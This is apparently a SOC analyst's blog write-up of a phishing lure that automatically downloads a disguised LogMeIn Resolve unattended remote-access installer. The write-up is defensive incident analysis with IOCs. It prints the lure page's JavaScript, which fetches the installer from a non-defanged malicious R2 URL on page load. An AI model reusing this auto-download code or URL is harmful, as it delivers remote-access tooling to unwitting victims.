====================
== Alert Overload ==
====================
Tales from a SOC analyst

LogMeIn Unattended Installer

LogMeIn Unattended Installer

A user received a phishing email that redirected the to hxxps[://]popthecard[.]pages[.]dev. This page claimed that a friend had sent an invitation, and that the user must download and open it on a windows laptop or desktop to view it. The page automatically downloaded the file VelvetPaperCo.exe (in similar incidents, invitation.exe).

alt text

The page itself is rather basic, with the following JavaScript code handling the download function. It simply sets a timeout and executes a function that reaches out to a public CloudFlare R2 bucket that hosts the malicious RMM installer.

	  function relunch(){
		  		window.location.href = "https://pub-f4f11fdd20cb4fbe961e1dc5fedcb0f6.r2.dev/VelvetPaperCo.exe";
	  }
    window.onload = function () {
      const loader = document.getElementById("loaderBar");
		const box = document.getElementById("loaderBox");
		setTimeout(() => { counter.innerHTML = "Downloading will start automatically in 2 seconds..."; }, 1000);
		setTimeout(() => { counter.innerHTML = "Downloading will start automatically in 1 seconds..."; 
		relunch();				 
						 }, 2000);
		setTimeout(() => { counter.innerHTML = "Downloading your invitation...";
						 	loader.style.width = "100%"; }, 3000);
		setTimeout(() => { box.style.display ="none"; }, 5200);
    };

Basic analysis of the downloaded file shows that it is a LogMeIn Resolve unattended installer. These installers can be generated by any GoToResolve customer according to the GoToResolve documentation.

alt text

Using an interactive sandbox, logs from the installation of the tool were recovered. These logs include the company ID of the GoToResolve customer that generated these installers.

alt text

alt text

The installer does check for the presence of certain security solutions and tools during the installation process.

alt text

Following are excerpts from several config files used by the installer. Unfortunately, the sandbox solution used has a time limit of 10 minutes. This prevented a full capture of the logs.

mandatory.json

If the installer is not provided command line arguments, the installer uses the mandatory.json file to retrieve installation options like Company ID and Service Name.

alt text

alt text

alt text

alt text

alt text

alt text

pc.json

alt text

unattended.json

alt text

IOCs

IOC Type Comment
hxxps[://]popthecard[.]pages[.]dev Domain Malicious phishing domain
hxxps[://]pub-f4f11fdd20cb4fbe961e1dc5fedcb0f6[.]r2[.]dev Domain Malicious domain serving the RMM download
721482adaa2480052b127a15cd281328e6fb9120f5cc8d8e156d432f50ab5cce SHA256 Hash Hash of the RMM installer